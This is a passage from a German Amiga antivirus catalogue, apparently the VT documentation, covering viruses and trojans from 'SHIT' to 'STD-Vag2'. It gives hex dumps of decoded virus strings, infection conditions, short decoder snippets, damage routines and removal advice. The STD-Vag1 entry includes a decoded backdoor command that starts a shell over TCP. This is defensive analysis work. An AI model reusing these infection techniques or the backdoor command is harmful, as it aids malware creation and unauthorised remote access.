  5100.          0030: 53484954 2f252a8c 62551bac aa3e9954 SHIT/%*.bU...>.T
  5101.          0040: 72f2a8fc c02e716a 8c6ad51a b5aa35eb r.....qj.j....5. 
  5102.                Block:     787
  5103.          0020: d301d542 60167c02 1e3b70e8 d2016604 ...B`.|..;p...f.
  5104.          0030: 53484954 d5425307 66f2d446 7c003a46 SHIT.BS.f..F|.:F
  5105.          0040: 3e03d201 66041220 d3016436 d643d201 >...f.. ..d6.C..
  5106.                Block:     848
  5107.          0020: 27191ef0 b7952d78 d4d74ffc 05519389 '.....-x..O..Q..
  5108.          0030: 53484954 43224310 173ee88a 89343b31 SHITC"C..>...4;1
  5109.          0040: 6c3e48ee 311d3a1d 1f4c8467 6fc107cc l>H.1.:..L.go...
  5110.          Diese Disk wurde wirklich von SHIT zerstoert. Sie sehen, es
  5111.          wird nur SHIT geschrieben und KEIN anderer Text ist in der
  5112.          Naehe.
  5113.  
  5114.    - Shocked-Gag   siehe bei Trick-Gag
  5115.  
  5116.    - SILESIAN-BB-Virus   s.o.  MOSH.1.0-BB-Virus
  5117.  
  5118.    - SILESIAN-Virus   Linkvirus  siehe bei INVADER-Virus
  5119.  
  5120.    - SMBX-Mount Virus  File  Laenge ungepackt: 65488 Bytes
  5121.          KEINE verbogenen Vektoren.
  5122.          Installiert Mount-Virus  (s.o.)
  5123.          Namensbegruendung: im File ist zu lesen:
  5124.            00000000 00001897 733a534d 42582d44 ........s:SMBX-D
  5125.            4f532e63 66675573 6572203a 20526573 OS.cfgUser : Res
  5126.             ......
  5127.            6963652f 2f2f2f2f 202d444f 532d5368 ice///// -DOS-Sh
  5128.            656c6c20 56202863 29313939 312f3932 ell V (c)1991/92
  5129.          Ein aufmerksamer User hat das Teil gefunden. Danke !!!!!!
  5130.          Es handelt sich um ein Shell-Programm, das mit einem Mail-
  5131.          box-Programm mitgeliefert werden soll?
  5132.          Das codierte Mount-Virus-Teil liegt von $EC38 bis $F068 im
  5133.          File. Es handelt sich beim Shell-Programm um eine Gfa-Basic-
  5134.          Compilierung und die Decodierung findet IM Gfa-Teil statt.
  5135.          Deshalb muss nach meiner Meinung der Programmierer des Mount-
  5136.          Virus-Teils den Source-Code des Basicprogramms besitzen.
  5137.          Ein Ausbau ist aus oben genannten Gruenden nicht moeglich.
  5138.          Empfehlung deshalb: loeschen und bei der Lieferfirma nach dem
  5139.          Programmierer forschen !!!
  5140.  
  5141.  
  5142.    - Smeg-Virus      File  Link
  5143.          ab KS2.04: ja   (Versionsabfrage auf mind. #37)
  5144.          Namensbegruendung:  im Linkteil ist decodiert zu lesen: 
  5145.             79002e69 6e662e6c 68612e6c 7a782e44 y..inf.lha.lzx.D
  5146.             4d53000a 536d6567 21204974 27732061 MS..Smeg! It's a
  5147.             0a486f73 74696c65 2054616b 654f7665 .Hostile TakeOve
  5148.             7221                                r!
  5149.          Verbogener Zeiger: $6c(ProcessStruktur) <> ProcessStrukturStart
  5150.          Resetfest: Nein
  5151.          Fileverlaengerung: 1900 Bytes
  5152.          Link hinter den ersten Hunk.
  5153.  
  5154.          Speicherverankerung:
  5155.            Die Lib-Liste wird durchlaufen. In Abhaengigkeit von $DFF007
  5156.            wird ein Libname z.B. expansion.library ausgelesen. Dieser
  5157.            Name wird um .library gekuerzt. Sollte er dann immer noch
  5158.            laenger als #14 sein, so wird weiter gekuerzt. Dieser Teil-
  5159.            name wird dann als VirusTaskName verwendet.
  5160.            Task wird erstellt (AddTask)
  5161.            TaskStack: #512
  5162.            Prio: 0
  5163.            Verbiegt $6c von bestimmten ProcessStrukturen (z.B. WB31) auf
  5164.            eigene TaskStruktur
  5165.            Wartet dann mit Wait auf DosBit Signal ($100)
  5166.            Hinweis1: Bei Tests ist es gelungen, das Teil mehrmals in der
  5167.            Taskliste auftauchen zu lassen (duerfte nicht sein)
  5168.            Hinweis2: VT versucht das Teil komplett aus der TaskWait-Liste
  5169.            zu entfernen. Bei meinen Tests ist das auch immer gut ge-
  5170.            gangen. Falls Sie Probleme bekommen (Maschine zeigt Guru),
  5171.            dann waere ich fuer eine Mitteilung dankbar. Allgemein sollten
  5172.            Sie ueberlegen, ob es nicht besser waere von einer schreibge-
  5173.            schuetzten AntiVirusDisk neu zu Booten.
  5174.          Vermehrungsbedingungen:
  5175.            - File ist noch nicht verseucht (eor.w d0,d1  cmp.w #$fab4,d1)
  5176.            - max. Filelaenge $20000 = #131072 Bytes
  5177.            - 3F3 wird gefunden
  5178.            - 3E9-Hunk wird gefunden
  5179.            - Medium validated
  5180.            - mind. #10 Block frei
  5181.            - Medium hat mind. #8000 Block  (also keine Disk-Verseuchung)
  5182.            - die vier Bytes 0,"VIR" (auch klein) werden nicht gefunden
  5183.            - jsr -xy(a6) wird gefunden  ( max. loop $7FFF )
  5184.              wird ersetzt durch bsr Virus
  5185.              oder
  5186.            - jmp -xy(a6) wird gefunden  ( max. loop $7FFF )
  5187.              wird ersetzt durch bra Virus
  5188.              oder
  5189.            - einer der beiden Befehle steht genau am Ende des 1. Hunks.
  5190.              Dann wird NOPNOP geschrieben.
  5191.              VT versucht das Linkteil auszubauen. Aber: Bei dem NOP-
  5192.              Sonderfall ist es NICHT mehr moeglich festzustellen, ob der
  5193.              Ursprung jsr oder jmp war. VT nimmt JMP, da es in diesem
  5194.              Hunk ja nicht mehr weitergeht.
  5195.          Das Teil meldet sich nicht.
  5196.          Hinweis3:
  5197.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  5198.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  5199.          wird dadurch geringer.
  5200.          Hinweis4:
  5201.          Eine Syquest wurde in 20 Minuten total verseucht. Die Syquest
  5202.          hat dann beim Booten in der startup-sequence (assign usw.) mit
  5203.          dem Reboot-Req. abgebrochen.
  5204.  
  5205.  
  5206.    - SNK-Virus   File  siehe bei PHANTOM-Virus
  5207.  
  5208.    - SnoopDos1.6-Virus  Einbruchsprogramm in AmiExpress
  5209.          Von der Definition kein Virus, da keine Vermehrungsroutine ge-
  5210.          funden wurde.
  5211.          gefunden in: SNOOPD16.LHA  35444
  5212.          Snoopdos-Laenge: 11312 Bytes    Orig.SnoopDos1.5 : 10540 Bytes
  5213.          Es wurde SD1.5 verwendet und ein neuer Hunk als 1. angehaengt.
  5214.          Die Hunkanzahl erhoeht sich von 3 auf 4. Der neue 1. Hunk
  5215.          ist codiert mit:
  5216.                     loop:  move.w #$2d1,d2
  5217.                            eor.b d2,(a2)+
  5218.                            dbf d2,loop
  5219.          Nach Decodierung ist zu lesen:
  5220.             4ED46172 702E6C69 62726172 79004242 NOarp.library.BB
  5221.             53004242 533A7573 65722E64 61746100 S.BBS:user.data.
  5222.             4242533A 75736572 2E6B6579 7300002A BBS:user.keys..*
  5223.             4242533A 4E6F6465 302F6C6F 676F6E2E BBS:Node0/logon.
  5224.             74787400 44455854 45520000 00000000 txt.DEXTER......
  5225.             00000000 00000000 00000000 00000000 ................
  5226.             00000052 45545552 4E000000 3D3E2046 ...RETURN...=> F
  5227.             414E5441 20434F4E 4E454354 20323030 ANTA CONNECT 200
  5228.             31203C3D 00000000 3034392D 34333133 1 <=....049-4313
  5229.             36333633 34000000 00FF0000 00005858 63634....y....XX
  5230.             58585858 58585800 008F0013 007570CC XXXXXXX......upI
  5231.  
  5232.         Empfehlung: Virus-File loeschen , logon loeschen und Orig.
  5233.             SnoopDos neu aufspielen. Keine Gefahr fuer Amiga-Be-
  5234.             nutzer ohne Mailbox.
  5235.         VT erkennt File: 23.10.92
  5236.         Hinweis 01.11.92:   gelesen im FIDO-Netz
  5237.         Laut Eddy Carroll (Prg. von Snoopdos) gibt es auch ein
  5238.         echtes SnoopDos 1.6, das allerdings nicht offiziell ver-
  5239.         breitet wurde. Das echte SD1.6 (hab ich nicht) soll bei
  5240.         Aufruf von version den Versions-Text ausgeben. Mein Test:
  5241.         Das SnoopDos1.6-Virus enthaelt den Text NICHT.
  5242.  
  5243.    - SnoopDos-JEFF-Virus  File   Laenge: 15336 Bytes
  5244.         Von der Definition ein trojanisches Pferd
  5245.         Jeff Butonic entfernt: 11568 Bytes
  5246.         A4000/40 : nur ohne cache
  5247.         Mit Hunklab wurde an SnoopDos ein Jeff-Butonic V4.55 ge-
  5248.         linkt. (JEFF siehe oben)
  5249.         Ob das SnoopDos-File V1.9 echt ist, kann ich nicht ent-
  5250.         scheiden.
  5251.         Mir ist die Version 1.9 (mein Kenntnisstand: Aug.93)
  5252.         nicht bekannt. Es koennte also jemand die Versionsnummer
  5253.         mit einem Monitor erhoeht haben. SnoopDos ist aber sauber.
  5254.            ff84584f 4cdf4080 4e752456 45523a20 ..XOL.@.Nu$VER:
  5255.            536e6f6f 70446f73 20312e39 20283132 SnoopDos 1.9 (12
  5256.            2e30352e 39332900 50726f63 65737320 .05.93).Process
  5257.            6e616d65 20202020 20202020 20204675 name          Fu
  5258.         VT erkennt bei File-Test: SnoopDos-JEFF
  5259.         VT erkennt im Speicher  :
  5260.          - Sie haben sich NICHT an die Anweisungen gehalten und
  5261.            SnoopDos NICHT abgeschaltet vor Benutzung von VT:
  5262.               "SnoopD.u.anderesPrg ist im Speicher"
  5263.          - Sie haben SnoopDos vorher abgeschaltet:
  5264.               "JEFF BUTONIC V4.55 ist im Speicher"
  5265.  
  5266.    - SnoopDos-Saddam-Virus  File   Laenge: 13776 Bytes
  5267.         Von der Definition ein trojanisches Pferd
  5268.         Saddam-Clone entfernt: 11568 Bytes
  5269.         Mit Hunklab wurde an SnoopDos ein Saddam-Clone-4711 ge-
  5270.         linkt. (Saddam-Clone siehe oben)
  5271.         Ob das SnoopDos-File V2.1 echt ist, kann ich nicht ent-
  5272.         scheiden. Aber unwahrscheinlich, da gleiche Laenge wie V1.9.
  5273.         Mir ist die Version 2.1 (mein Kenntnisstand: Aug.93)
  5274.         nicht bekannt. Es koennte also jemand die Versionsnummer
  5275.         mit einem Monitor erhoeht haben. SnoopDos ist aber sauber.
  5276.            4e752456 45523a20 536e6f6f 70446f73 Nu$VER: SnoopDos
  5277.            20322e31 20283232 2e30372e 39332900  2.1 (22.07.93).
  5278.        Verhalten:
  5279.          SnoopDos V2.1 hab ich bei verseuchtem File NIE auf dem Bild-
  5280.          schirm gesehen.
  5281.         KS2.04:
  5282.          Das File stuerzt mit GURU 3 ab und nach Tastatur-Reset ist
  5283.          der Speicher sauber.
  5284.         KS1.3:
  5285.          Das File wird geladen und dann tut sich NICHTS mehr. Snoop-
  5286.          Dos V2.1 ist bei mir nicht erschienen.
  5287.          Tastatureingaben erscheinen auf dem Bildschirm, werden aber
  5288.          nicht ausgefuehrt.
  5289.          UND JETZT KOMMT DAS SCHLIMME:
  5290.          Nach einem Tastatur-Reset arbeitet der SADDAM-Disk-Validator
  5291.          im Speicher (man erinnere sich: Saddam hat eine Cold-Reboot-
  5292.          Routine, die AUCH mit FastMem arbeitet). Das Kreset-Prg im
  5293.          Unterverzeichnis von VT-Schutz hilft aber auch dagegen.
  5294.  
  5295.    - SOFIA Virus   BB   GYROS-Clone  s.o.
  5296.  
  5297.    - Sonja VIRUS   BB      KS2.04: NEIN
  5298.     Fordert trackdisk.device: JA
  5299.     BeginIo, KickTag, KickCheckSum
  5300.     Codiert mit Wert aus $DFF007
  5301.     DecodierRoutine: eor.b d0,-(a1)
  5302.     Im Speicher findet man dann z.B.:
  5303.                     00007472 61636B64 69736B2E      ..trackdisk.
  5304.            64657669 63650014 49742773 20536F6E device..It's Son
  5305.            6A612056 49525553 21212100 28632939 ja VIRUS!!!.(c)9
  5306.            31206279 204D4300                   1 by MC.
  5307.  
  5308.     Vermehrung: als BB
  5309.     Schaeden:
  5310.     Sobald eine Zaehlzelle den Wert $14 erreicht hat, wird eine
  5311.         Format-Routine aufgerufen. Formatiert wird Track 2, 4, 6 usw.
  5312.         (Mal was Neues). Dann wird nach Block #880 ein neuer Rootblock
  5313.         geschrieben. RootBlockAuszug:
  5314.          1A0: 00000000 00000000 00000000 00000000 ................
  5315.          1B0: 14497427 7320536F 6E6A6120 56495255 .It's Sonja VIRU
  5316.          1C0: 53212121 00286329 39312062 79204D43 S!!!.(c)91 by MC
  5317.          1D0: 00000000 00000000 00000000 00000000 ................
  5318.  
  5319.         Am Schluss wird nach $FC0000 (reset) gesprungen. Die Disk
  5320.         ist unbrauchbar. Es ist NICHTS mehr zu retten. Da der Disk-
  5321.         name durch das Byte 1B0 = $14 in der Laenge begrenzt wird,
  5322.         erfolgt die Ausgabe nur bis zum letzten ! .
  5323.  
  5324.         BootBlock-Erkennung mit VT getestet:  23.09.92
  5325.         Speicher-Erkennung mit VT getestet :  23.09.92
  5326.  
  5327.    - SPEEDER-Virus  Zerstoerungsfile      anderer und richtiger
  5328.         Name: Descriptor-Virus  siehe oben
  5329.  
  5330.  
  5331.    - SPEEDUP-Inst.   File
  5332.         Filename: SPEEDUP.EXE
  5333.         Laenge: 92576 Bytes
  5334.         Soll das Linkteil im Speicher verankern.
  5335.         Sehr viel Platz in diesem File ist Muell, der nie erreicht wird.
  5336.         Vt bietet Loeschen an.
  5337.  
  5338.    - SPEEDUP-Virus   Link
  5339.         Der Name wurde von dem Installerteil uebernommen, da sich im
  5340.         Linkteil nichts angeboten hat.
  5341.         Verbogene Vektoren: LoadSeg
  5342.               und falls pmbsonline.lib vorhanden, -$78(dieser lib)
  5343.         Diese Lib kenne ich nicht. Also kann ich zu den Auswirkungen,
  5344.         keine Aussage treffen.
  5345.         Link hinter den ersten Hunk
  5346.         Fileverlaengerung immer #1244 Bytes
  5347.         Linkteil nicht codiert
  5348.         Im Linkteil ist zu lesen:
  5349.           2a40d3fc ffffff6c 22510ca9 4afc4afd *@.....l"Q..J.J.
  5350.             ;.....                   ^^^^^^^^
  5351.           03d0706d 62736f6e 6c696e65 2e6c6962 ..pmbsonline.lib
  5352.           72617279 0000646f 732e6c69 62726172 rary..dos.librar
  5353.             ;.....
  5354.           00000000 00000000 7fde3ba3 000003f2 .........;.....
  5355.                             ^^^^^^^^
  5356.         Verankerung im Speicher:
  5357.          Ueber Loadseg
  5358.          Dabei wird ueberprueft, ob sich das Teil schon im Speicher
  5359.          (4afc4afd) befindet.
  5360.         FileLink:
  5361.          Das Teil enthaelt eine Zaehlzelle, damit nicht bei jedem
  5362.          LoadSeg-Aufruf ein Linkversuch unternommen wird.
  5363.          Test ob File schon verseucht (7fde3ba3)
  5364.          Medium validated
  5365.          Mind. 5 Block frei
  5366.          Filename enthaelt nicht "."
  5367.          Kein Test auf Filelaenge oder 3E9-Hunk
  5368.          Es wird im Original-Hunk ein Bra ($6000) gesucht. Dabei muss
  5369.          das BRA in einem Loop mind. $13+1 mal gefunden werden, sonst
  5370.          findet keine Veraenderung statt. Diese Bra darf nicht weiter
  5371.          als $7FFE vom Linkteilbeginn entfernt sein. Dieser BRA-Befehl
  5372.          wird dann mit BRA Virusteil ueberschrieben.
  5373.         VT bietet Ausbau an
  5374.  
  5375.  
  5376.    - Sphinx-BB   SCA-Clone s.o.
  5377.  
  5378.    - SS Virus BB  Cool immer $7C078  immer ab $7C000
  5379.          Bei mir mit KS2.04 nach Reset kein neuboot von Disk.
  5380.          Unter KS1.3 werden nach dem Reset 2 Interrupts installiert.
  5381.             Nr. 3 = Ports = $7C1D6 = SS.install
  5382.             Nr. 5 = VERTB = $7C1F8 = SS.greetings
  5383.          VT entfernt beim loeschen die Namen und setzt die Codezeiger
  5384.             auf 0 mit RemIntServer. Also keine Gefahr mehr. vgl. VT =
  5385.             Listen = IntVec
  5386.          Sobald die Zaehlzelle den Wert #$500 erreicht hat wird eine
  5387.          Graphikroutine angesprungen:
  5388.          schwarzer Hintergrund, helle Schrift
  5389.          Hakenkreuz,SS-Rune,Hakenkreuz und dann
  5390.             your computer is infected by SS-Virus!
  5391.          Danach ist ein Reset notwendig, da das VirusPrg. sich in einer
  5392.          Endlosschleife befindet.
  5393.          Der BB ist codiert mit eor.l d0,(a0)+
  5394.          Von der Definition handelt es sich nicht um einen BB-Virus,
  5395.          da keine Vermehrungsroutine gefunden wurde.
  5396.          siehe auch MOSH, HEIL-Virus
  5397.  
  5398.    - STARCOMReturn-Virus   BB   richtig: The Return of STARCOM
  5399.          anderer Name: STARCOM 2
  5400.          LAMER 4 -Clone  siehe oben
  5401.          Es wurden nur Texte geaendert. Decodiert ist im Speicher zu
  5402.          lesen:
  5403.            51c8fffc 4e757472 61636b64 69736b2e Q...Nutrackdisk.
  5404.            64657669 63650054 68652052 65747572 device.The Retur
  5405.            6e206f66 20535441 52434f4d 21212121 n of STARCOM!!!!
  5406.            21bfabcd 00fc0a78 00fe9c3e 0000a4e8 !......x...>....
  5407.          Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es
  5408.          wurde dabei uebersehen, das das Original noch das Wort R!
  5409.          setzt oder war man nicht in der Lage, die Schleife zu aendern.
  5410.              Block:     350
  5411.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5412.            52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST
  5413.                   ;......
  5414.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5415.            52215354 43215221 53544321 52212121 R!STC!R!STC!R!!!
  5416.          Sollte so ein Block in einem File liegen (BlockKette), so ist
  5417.          KEINE Rettung des Files moeglich. Tut mir leid.
  5418.  
  5419.  
  5420.    - STARCOM 1 Virus   CCCP-Clone siehe oben  also BB und Link
  5421.          KS1.3  ja
  5422.          KS2.04 ja
  5423.          Mehrfachlinks: ja
  5424.          Defekte Files: ja   (Hunkstruktur defekt nur loeschen moeglich)
  5425.          Eine Meisterleistung: NUR der ASCII-Text wurde geaendert:
  5426.           70004e75 53544152 434f4d21 21214df8 p.NuSTARCOM!!!M.
  5427.  
  5428.    - STARCOM 2 Virus  siehe bei STARCOMReturn-Virus
  5429.  
  5430.    - STARCOM 3 Virus  Byte Voyager 1 Clone  siehe oben  BB
  5431.          Eine Meisterleistung: NUR Text geaendert
  5432.          Decodiert ist zu lesen:
  5433.            fff64681 23410004 4cdf0303 4e751e54 ..F.#A..L...Nu.T
  5434.            68652052 4556454e 4745206f 66205354 he REVENGE of ST
  5435.            4152434f 4d202121 21000000 00000000 ARCOM !!!.......
  5436.          Schreibt auch in Bock 880 (nur bei Disk Root)
  5437.            Block:     880
  5438.          01b0: 1e546865 20524556 454e4745 206f6620 .The REVENGE of
  5439.          01c0: 53544152 434f4d20 21212100 00000000 STARCOM !!!.....
  5440.          Dies bewirkt bei Disk einen neuen Namen.
  5441.          Fordert Trackdisk.device NICHT
  5442.          Hinweis: Das Programm sichert den Bereich ab $7F000 NICHT.
  5443.          D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle
  5444.          geladen werden. Da der verbogene KickTagzeiger in der Exec
  5445.          liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus-
  5446.          gabe "unbekanntes Prg" oder "ResStruc ungerade" kommen. Mit
  5447.          5 MB wurde dieses Virusteil im Speicher richtig erkannt, aber
  5448.          natuerlich bleibt unter KS1.3 bei dieser Speichergroesse, nach
  5449.          einem RESET das Prg. nicht erhalten und eine Vermehrung ist
  5450.          ueber DoIo nicht moeglich.
  5451.  
  5452.    - STARCOM 4 Virus   BB
  5453.          LAMER 6 -Clone  siehe oben
  5454.          Es wurden nur Texte geaendert. Decodiert ist im Speicher zu
  5455.          lesen:
  5456.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  5457.            00412074 6f756368 206f6620 53544152 .A touch of STAR
  5458.            434f4d20 76697275 73212000 b800abcd COM virus! .....
  5459.          Eine Meisterleistung ist das Zerstoerungslangwort STC! . Es
  5460.          wurde dabei uebersehen, das das Original noch das Wort R!
  5461.          setzt oder war man nicht in der Lage, die Schleife zu aendern.
  5462.              Block:     480
  5463.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5464.            52215354 43215221 53544321 52215354 R!STC!R!STC!R!ST
  5465.                   ;......
  5466.            53544321 52215354 43215221 53544321 STC!R!STC!R!STC!
  5467.            52215354 43215221 53544321 52212121 R!STC!R!STC!R!!!
  5468.          Sollte so ein Block in einem File liegen (BlockKette), so ist
  5469.          KEINE Rettung des Files moeglich. Tut mir leid.
  5470.  
  5471.    - STARCOM 5 Virus   BB  boot-aids Virus Clone  siehe oben
  5472.          Im BB und Speicher ist uncodiert zu lesen:
  5473.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  5474.            00005468 65205354 4152434f 4d204176 ..The STARCOM Av
  5475.            656e6765 7220312e 30302021 00010000 enger 1.00 !....
  5476.          Vermehrung: BB
  5477.          Schaeden: soll STC!aw in einen Block schreiben und damit
  5478.          das File unbrauchbar machen. KEINE Rettung moeglich.
  5479.          Besonderheit: In Boot-aids existiert eine Routine:
  5480.                      cmpi.b #8,3(a0)
  5481.                      bne.s $FEEF6
  5482.          Dies bewirkt, dass nur Datenbloecke zerstoert werden koen-
  5483.          nen. Diese Routine wird bei Starcom 5 abgeschaltet, da
  5484.          bne.s durch ein NOP ersetzt wurde.
  5485.  
  5486.    - STARCOM 6 Virus  BB  Forpib-Clone siehe oben
  5487.          Eine Meisterleistung: nur Text geaendert im BB.
  5488.            2020202a 2a2a2054 68652053 74617263    *** The Starc
  5489.            6f6d2042 4c41434b 4f555421 20286329 om BLACKOUT! (c)
  5490.            20313939 33202a2a 2a202020 20202020  1993 ***
  5491.  
  5492.    - STARFIRE/NorthStar 1   anderer Name  BlackStar
  5493.          Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 1
  5494.          testet nicht auf SystemZ, nur auf SCA, ByteBandit = DisplayAlert
  5495.          Vermehrung: ueber BB
  5496.          Im BB lesbar:
  5497.          Virus detected on this disk  usw.
  5498.          Reset,WriteProt OFF (bei NorthStar2 nicht vorhanden)
  5499.          Clones: East-Star
  5500.  
  5501.    - STARFIRE/NorthStar 2 = OldNorthStar  ????
  5502.          Cool, DoIo, im Speicher immer ab $7ec00, VersionsNr: 2
  5503.          testet auf SCA, ByteBandit, SystemZ, NorthStar1, Folge=DisplayAlert
  5504.          Vermehrung: ueber BB
  5505.          Im BB lesbar:
  5506.          VIRUS detected on this disk  usw.
  5507.          My AntiVirus is better!    (bei NorthStar1 nicht vorhanden)
  5508.          Clones: z.B. Payday.BB
  5509.  
  5510.    - Starfire2    nur Block 0, sehr viel Text: The Virusbusters North Star
  5511.          Es ist kein Virus.
  5512.  
  5513.    - STARLIGHT   File  2600   BRET HAWNES - Clone (siehe oben)
  5514.          KS2.04 : ja
  5515.          Laenge 8 Bytes weniger als Original, weil 03EC-Hunk ent-
  5516.          fernt wurde.  Vermehrt sich das Teil, so ist die Laenge
  5517.          wieder 2608, da der 03EC-Hunk vom Virus angelegt wird.
  5518.          Wird von VT nur als Bret-Virus erkannt.
  5519.          Der lesbare Text (nicht der codierte) wurde geaendert.
  5520.          Am Fileanfang:
  5521.            0000027D 60000018 53544152 4C494748 ...}`...STARLIGH
  5522.            54203120 50524F44 55435449 4F4E2C79 T 1 PRODUCTION,y
  5523.          Am Fileende:
  5524.            F9526100 FED66000 FA02444F 20594F55          .DO YOU
  5525.            204C494B 45204D59 20464952 53542056  LIKE MY FIRST V
  5526.            49525553 203F2044 4F4E4520 4259204D IRUS ? DONE BY M
  5527.            43444A2D 4444454E 49545921 20323130 CDJ-DDENITY! 210
  5528.            32393000 00000000 000003F2 000003EB 290....
  5529.          Wird vielleicht von anderen AntivirusPrg als Starlight
  5530.          - Virus erkannt. VT bleibt bei BRET HAWNES.
  5531.  
  5532.  
  5533.    - STARLIGHT   BB     Warhawk-Clone  s.u.
  5534.          Nur Text geaendert.
  5535.  
  5536.    - STARLIGHT II  BB   MicroSystems-Clone s.o.
  5537.          Nur Text geaendert.
  5538.  
  5539.    - STD-Crabs1-Install  Installer
  5540.       Archivename: mdlx09c.lha (Fremdaussage, hab ich nicht)
  5541.       Filename:    MiamiDx.beta 439724 Bytes
  5542.       Warum Installer
  5543.       - Zerstoerungs-NOP fehlt
  5544.       - Linkteil ist kuerzer als nach Linkcode (mind. C1) moeglich
  5545.       - Linkteil wird nicht ueber NOP erreicht, sondern mit BRA.L
  5546.         gleich am Fileanfang angesprungen.
  5547.       Loeschen Sie bitte das Teil
  5548.       Rest siehe STD-Crabs1-LVirus 
  5549.       Nachtrag 99-02-09: Erschienen ist MiamiDx09d.beta
  5550.  
  5551.    - STD-Crabs1-LVirus    Linkvirus
  5552.       Fileverlaengerung: #772-832 Bytes
  5553.       Nicht Resetfest
  5554.       Ab KS2.04
  5555.       Verbogene Vektoren: LoadSeg
  5556.       Zerstoerung: In Abhaengigkeit von $DFF009 wird ein NOP in
  5557.          das File geschrieben. Da Ursprungswert und -Stelle NICHT
  5558.          gerettet werden, ist ein Ausbau NICHT sinnvoll. Einige ver-
  5559.          seuchte Files laufen. Die Mehrheit erzeugt einen Guru. VT
  5560.          bietet nur Loeschen an.
  5561.       dir vorher                      nachher
  5562.       0f8: 70012b40 fe44602c p.+@.D`, 0f8: 70012b40 fe444e71 p.+@.DNq
  5563.                         ^^^^                            ^^^^
  5564.       delete vorher                   nachher
  5565.       080: 2c4a4eae fce22f40 ,JN.../@ 080: 4e714eae fce22f40 NqN.../@
  5566.            ^^^^                            ^^^^
  5567.       Decodiert ist im Linkteil zu lesen:
  5568.                                536e 6f6f7044           SnoopD
  5569.          6f732053 7570706f 72742050 726f6365 os Support Proce
  5570.          73730053 54442070 72657365 6e747320 ss.STD presents
  5571.          2d2d2d20 43726162 73202331 202d2049 --- Crabs #1 - I
  5572.          74636879 20596574 3f00              tchy Yet?.
  5573.       Speicherverankerung:
  5574.            - FindTask verbogen - Ende
  5575.            - Examine verbogen - Ende
  5576.            - SnoopDos im Speicher - CCR wird veraendert
  5577.            - Loadseg wird verbogen
  5578.       Linkvorgang:
  5579.            - mit LoadSeg hinter den 1. Hunk
  5580.            - Laenge variabel in Abhaengigkeit von einer Zelle,
  5581.              die immer ihren Wert aendert (Addition)
  5582.            - Codierung immer neu mit EOR und dieser Zelle mit
  5583.              Wertaenderung
  5584.            - Findtask nicht veraendert
  5585.            - Examine nicht veraendert
  5586.            - Filename enthaelt nicht "." oder "-"
  5587.            - Medium validated
  5588.            - 3 Block frei
  5589.            - File groesser #1024 Bytes
  5590.            - File kleiner KEINE Grenze
  5591.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5592.              Ersetzen durch NOP
  5593.            - In Abhaengigkeit von $DFF009 ein NOP in den 1.Hunk
  5594.              schreiben.
  5595.            - FileDate zurueckschreiben
  5596.       Empfehlung: Falls Sie gelinkte Files finden und Originalfiles
  5597.              zurueckspielen muessen.
  5598.              VTprefs/Filetest-Requester nach df0:test
  5599.              Klicke alle Requester.
  5600.              Sie haben danach eine Liste mit allen Files, die Sie
  5601.              neu aufspielen muessen.
  5602.          VT sollte das Teil am File und im Speicher finden.
  5603.  
  5604.    - STD-Vag1-Install  Installer
  5605.       Filename:  CED417 #169872 Bytes
  5606.       Springt vom Fileanfang in das Linkteil
  5607.       Linkteil ist mit EOR codiert
  5608.       Linkteil soll an c:mount gelinkt werden (nur an dieses File)
  5609.       Loeschen Sie bitte das CED417-File
  5610.       Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu-
  5611.       stand am Fileanfang mir unbekannt ist.
  5612.       Rest siehe STD-Vag1-Trojan
  5613.  
  5614.    - STD-Vag1-Trojan
  5615.       Fileverlaengerung: immer #800 Bytes
  5616.       Filename: nur c:mount
  5617.       Nicht Resetfest
  5618.       Ab KS2.04
  5619.       Verbogene Vektoren: LoadSeg
  5620.       Decodiert ist im Linkteil zu lesen:    
  5621.                        536e 6f6f7044 6f732053       SnoopDos S
  5622.           7570706f 72742050 726f6365 73730043 upport Process.C
  5623.           3a4d6f75 6e740072 756e203e 4e494c3a :Mount.run >NIL:
  5624.           206e6577 7368656c 6c205443 50003232  newshell TCP.22
  5625.           32370000 53544420 70726573 656e7473 27..STD presents
  5626.           202d2056 6167696e 69746973 20233120  - Vaginitis #1
  5627.           2d2d2064 69727479 206d6f6c 6521     -- dirty mole!
  5628.       Speicherverankerung:
  5629.            - FindTask veraendert - Ende
  5630.            - Examine veraendert - Ende
  5631.            - SnoopDos im Speicher - CCR wird veraendert
  5632.            - Loadseg wird verbogen
  5633.       Linkvorgang:
  5634.            - hinter den 1. Hunk von mount
  5635.            - Codierung mit EOR
  5636.            - Findtask nicht veraendert
  5637.            - Examine nicht veraendert
  5638.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5639.              Ersetzen durch NOP (dadurch kein "100% richtiger" Aus-
  5640.              bau moeglich vgl. auch Fungus)
  5641.            - FileDate zurueckschreiben
  5642.       Schaden:
  5643.            - Suche TCP in DosList
  5644.            - Setze hinter TCP (s.o.) einen Doppelpunkt
  5645.            - DosExecute run >NIL: .....
  5646.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5647.              Rechner ermoeglicht werden
  5648.       Vgl. auch alle anderen STD-Varianten und Fungus
  5649.  
  5650.    - STD-Vag2-Install  Installer
  5651.       Filename:  rexxkuang11.library 0.36 L: #31172 Bytes
  5652.       Springt im File mit BRA in das Linkteil
  5653.       Linkteil ist mit EOR codiert
  5654.       Linkteil soll an c:mount gelinkt werden (nur an dieses File)
  5655.       Loeschen Sie bitte die Lib
  5656.       Ein sauberer Ausbau ist NICHT moeglich, da der Originalzu-
  5657.       stand des Files mir unbekannt ist.
  5658.       Rest siehe STD-Vag2-Trojan
  5659.  
  5660.    - STD-Vag2-Trojan
  5661.       Fileverlaengerung: immer #800 Bytes
  5662.       Filename: nur c:mount
  5663.       Nicht Resetfest
  5664.       Ab KS2.04
  5665.       Verbogene Vektoren: LoadSeg
  5666.       Decodiert ist im Linkteil zu lesen: 
